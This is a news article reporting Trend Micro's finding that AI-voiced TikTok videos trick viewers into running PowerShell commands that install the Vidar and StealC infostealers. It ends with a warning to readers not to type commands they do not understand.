Trend Micro researchers are warning TikTok users. Experts have discovered that some AI-generated videos are involved in ClickFix cyberattacks. This type of attack involves manipulating users. Cybercriminals encourage their victims to perform risky actions themselves, allowing them to bypass security systems. ClickFix attacks are increasingly widespread in the criminal world. They have notably become a key tool of the North Korean hackers Lazarus, who specialize in cryptocurrency theft.
Videos with AI-generated voices
In the scenario revealed by Trend Micro, the videos encourage users to execute commands that are supposed to activate Windows and Microsoft Office or exclusive features on popular software, such as Spotify. Eager to activate functions without paying, users will obey the instructions in the videos. Experts say these are PowerShell commands, the command-line tool built into Windows that allows you to control, configure, or diagnose a computer. All the videos are "very similar" and have "only minor differences in camera angles and download URLs" embedded in the command lines. All the clips feature a robotic voice generated by artificial intelligence. These robotic voices have become ubiquitous on social media in recent months. As the Trend Micro report explains, cybercriminals are using TikTok to reach a large number of Internet users. Some of the malicious videos have reached "more than half a million views." They also generate a lot of engagement. A video promising to help you improve Spotify has accumulated more than 20,000 likes and more than 100 comments. The campaign videos were uploaded by several different accounts. These are no longer active on TikTok, Trend Micro points out.
Sensitive Data Theft on Windows
Unfortunately for Internet users, the commands entered in the video will instead remotely download, install, and execute a malicious script on their computer. This script is programmed to install viruses on the machine, particularly infostealers. This type of malware specializes in stealing information, such as passwords, logins, or banking details.
Among the viruses exploited by hackers are malware like Vidar or StealC. For example, Vidar is capable of taking screenshots without users' knowledge and sucking up credit card numbers. StealC, on the other hand, will focus on information stored by the web browser, which puts cookies and identifiers at risk. In any case, the sucked data puts Internet users at risk.
We therefore recommend that you be wary of AI-generated videos that are rife on TikTok. If they offer to run PowerShell commands on your computer, take the time to learn about how they work and their purpose. In any case, do not type the commands without knowing what you are doing. You could be giving control of your computer to a cybercriminal.
Source: Trend Micro
0 Comments